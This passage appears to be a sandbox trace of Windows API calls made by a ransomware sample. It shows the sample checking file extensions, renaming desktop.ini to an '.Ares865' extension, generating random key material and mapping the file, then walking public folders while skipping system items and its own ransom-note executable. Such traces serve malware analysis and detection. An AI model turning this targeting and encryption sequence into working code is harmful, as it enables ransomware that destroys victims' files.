[0039.606] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.606] lstrlenW (lpString="p96") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.606] lstrlenW (lpString="p97") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.606] lstrlenW (lpString="pan") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.606] lstrlenW (lpString="pdb") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.606] lstrlenW (lpString="pdm") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.606] lstrlenW (lpString="pnz") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.606] lstrlenW (lpString="qry") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.606] lstrlenW (lpString="qvd") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.606] lstrlenW (lpString="rbf") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.606] lstrlenW (lpString="rctd") returned 4 [0039.606] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.606] lstrlenW (lpString="rod") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.606] lstrlenW (lpString="rodx") returned 4 [0039.606] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.606] lstrlenW (lpString="rpd") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.606] lstrlenW (lpString="rsd") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.606] lstrlenW (lpString="sas7bdat") returned 8 [0039.606] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.606] lstrlenW (lpString="sbf") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.606] lstrlenW (lpString="scx") returned 3 [0039.606] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.607] lstrlenW (lpString="sdb") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.607] lstrlenW (lpString="sdc") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.607] lstrlenW (lpString="sdf") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.607] lstrlenW (lpString="sis") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.607] lstrlenW (lpString="spq") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.607] lstrlenW (lpString="te") returned 2 [0039.607] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.607] lstrlenW (lpString="teacher") returned 7 [0039.607] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.607] lstrlenW (lpString="tmd") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.607] lstrlenW (lpString="tps") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.607] lstrlenW (lpString="trc") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.607] lstrlenW (lpString="trc") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.607] lstrlenW (lpString="trm") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.607] lstrlenW (lpString="udb") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.607] lstrlenW (lpString="udl") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.607] lstrlenW (lpString="usr") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.607] lstrlenW (lpString="v12") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.607] lstrlenW (lpString="vis") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.607] lstrlenW (lpString="vpd") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.607] lstrlenW (lpString="vvv") returned 3 [0039.607] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.608] lstrlenW (lpString="wdb") returned 3 [0039.608] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.608] lstrlenW (lpString="wmdb") returned 4 [0039.608] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.608] lstrlenW (lpString="wrk") returned 3 [0039.608] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.608] lstrlenW (lpString="xdb") returned 3 [0039.608] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.608] lstrlenW (lpString="xld") returned 3 [0039.608] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.608] lstrlenW (lpString="xmlff") returned 5 [0039.608] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\desktop.ini.Ares865") returned 35 [0039.608] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0039.608] CreateFileW (lpFileName="C:\\Users\\Public\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xf0 [0039.609] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0039.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2e30020 [0039.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc5b0 [0039.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0039.609] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0039.610] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0039.610] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0039.610] CreateFileMappingW (hFile=0xf0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x108 [0039.615] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0039.616] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0039.617] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0039.617] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0039.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc760 [0039.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cc760 [0039.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0039.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0039.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cc760 [0039.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0039.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0039.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0039.618] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0039.618] CloseHandle (hObject=0x108) returned 1 [0039.618] CloseHandle (hObject=0xf0) returned 1 [0039.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0039.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0039.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e30020 | out: hHeap=0x2b0000) returned 1 [0039.620] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="aoldtz.exe") returned 1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="temp") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="perflogs") returned -1 [0039.620] lstrcmpiW (lpString1="Documents", lpString2="MSBuild") returned -1 [0039.620] lstrlenW (lpString="Documents") returned 9 [0039.620] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27 [0039.620] lstrcpyW (in: lpString1=0x2cce420, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0039.620] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents", dwFileAttributes=0x10) returned 1 [0039.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0039.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2cc5b0 [0039.620] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7bb0 [0039.621] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="aoldtz.exe") returned 1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="temp") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="perflogs") returned -1 [0039.621] lstrcmpiW (lpString1="Downloads", lpString2="MSBuild") returned -1 [0039.621] lstrlenW (lpString="Downloads") returned 9 [0039.621] lstrlenW (lpString="C:\\Users\\Public\\Documents") returned 25 [0039.621] lstrcpyW (in: lpString1=0x2cce420, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0039.621] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads", dwFileAttributes=0x10) returned 1 [0039.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0039.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2ccda8 [0039.621] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7bd0 [0039.622] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="aoldtz.exe") returned 1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="temp") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="perflogs") returned -1 [0039.622] lstrcmpiW (lpString1="Favorites", lpString2="MSBuild") returned -1 [0039.622] lstrlenW (lpString="Favorites") returned 9 [0039.622] lstrlenW (lpString="C:\\Users\\Public\\Downloads") returned 25 [0039.622] lstrcpyW (in: lpString1=0x2cce420, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0039.622] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Favorites", dwFileAttributes=0x12) returned 1 [0039.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0039.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2ccde8 [0039.622] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7bf0 [0039.622] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49484f20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49484f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.623] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.623] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="aoldtz.exe") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="windows") returned -1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="bootmgr") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="temp") returned -1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="pagefile.sys") returned -1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="boot") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="ids.txt") returned 1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="ntuser.dat") returned -1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="perflogs") returned -1 [0039.623] lstrcmpiW (lpString1="Libraries", lpString2="MSBuild") returned -1 [0039.623] lstrlenW (lpString="Libraries") returned 9 [0039.623] lstrlenW (lpString="C:\\Users\\Public\\Favorites") returned 25 [0039.623] lstrcpyW (in: lpString1=0x2cce420, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0039.623] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Libraries", dwFileAttributes=0x12) returned 1 [0039.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0039.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2cce28 [0039.623] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7c10 [0039.623] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0039.623] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="aoldtz.exe") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="temp") returned -1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="perflogs") returned -1 [0039.624] lstrcmpiW (lpString1="Music", lpString2="MSBuild") returned 1 [0039.624] lstrlenW (lpString="Music") returned 5 [0039.624] lstrlenW (lpString="C:\\Users\\Public\\Libraries") returned 25 [0039.624] lstrcpyW (in: lpString1=0x2cce420, lpString2="Music" | out: lpString1="Music") returned="Music" [0039.624] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music", dwFileAttributes=0x10) returned 1 [0039.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0039.624] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ed090 [0039.624] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c30 [0039.624] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0039.624] lstrcmpiW (lpString1="Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.624] lstrcmpiW (lpString1="Pictures", lpString2="aoldtz.exe") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="bootmgr") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="temp") returned -1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="pagefile.sys") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="boot") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="ids.txt") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="perflogs") returned 1 [0039.625] lstrcmpiW (lpString1="Pictures", lpString2="MSBuild") returned 1 [0039.625] lstrlenW (lpString="Pictures") returned 8 [0039.625] lstrlenW (lpString="C:\\Users\\Public\\Music") returned 21 [0039.625] lstrcpyW (in: lpString1=0x2cce420, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0039.625] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures", dwFileAttributes=0x10) returned 1 [0039.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0039.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x32) returned 0x2cce68 [0039.625] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c50 [0039.625] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="aoldtz.exe") returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2=".") returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="..") returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="windows") returned -1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="bootmgr") returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="temp") returned -1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="pagefile.sys") returned 1 [0039.625] lstrcmpiW (lpString1="Recorded TV", lpString2="boot") returned 1 [0039.626] lstrcmpiW (lpString1="Recorded TV", lpString2="ids.txt") returned 1 [0039.626] lstrcmpiW (lpString1="Recorded TV", lpString2="ntuser.dat") returned 1 [0039.626] lstrcmpiW (lpString1="Recorded TV", lpString2="perflogs") returned 1 [0039.626] lstrcmpiW (lpString1="Recorded TV", lpString2="MSBuild") returned 1 [0039.626] lstrlenW (lpString="Recorded TV") returned 11 [0039.626] lstrlenW (lpString="C:\\Users\\Public\\Pictures") returned 24 [0039.626] lstrcpyW (in: lpString1=0x2cce420, lpString2="Recorded TV" | out: lpString1="Recorded TV") returned="Recorded TV" [0039.626] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Recorded TV", dwFileAttributes=0x10) returned 1 [0039.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0039.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2ccea8 [0039.626] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7c70 [0039.626] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="aoldtz.exe") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="temp") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0039.626] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0039.627] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0039.627] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0039.627] lstrcmpiW (lpString1="Videos", lpString2="perflogs") returned 1 [0039.627] lstrcmpiW (lpString1="Videos", lpString2="MSBuild") returned 1 [0039.627] lstrlenW (lpString="Videos") returned 6 [0039.627] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV") returned 27 [0039.627] lstrcpyW (in: lpString1=0x2cce420, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0039.627] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos", dwFileAttributes=0x10) returned 1 [0039.627] RtlAllocateHeap 